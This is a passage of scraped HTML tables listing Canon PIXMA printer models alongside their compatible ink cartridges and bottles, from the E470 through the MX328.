E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 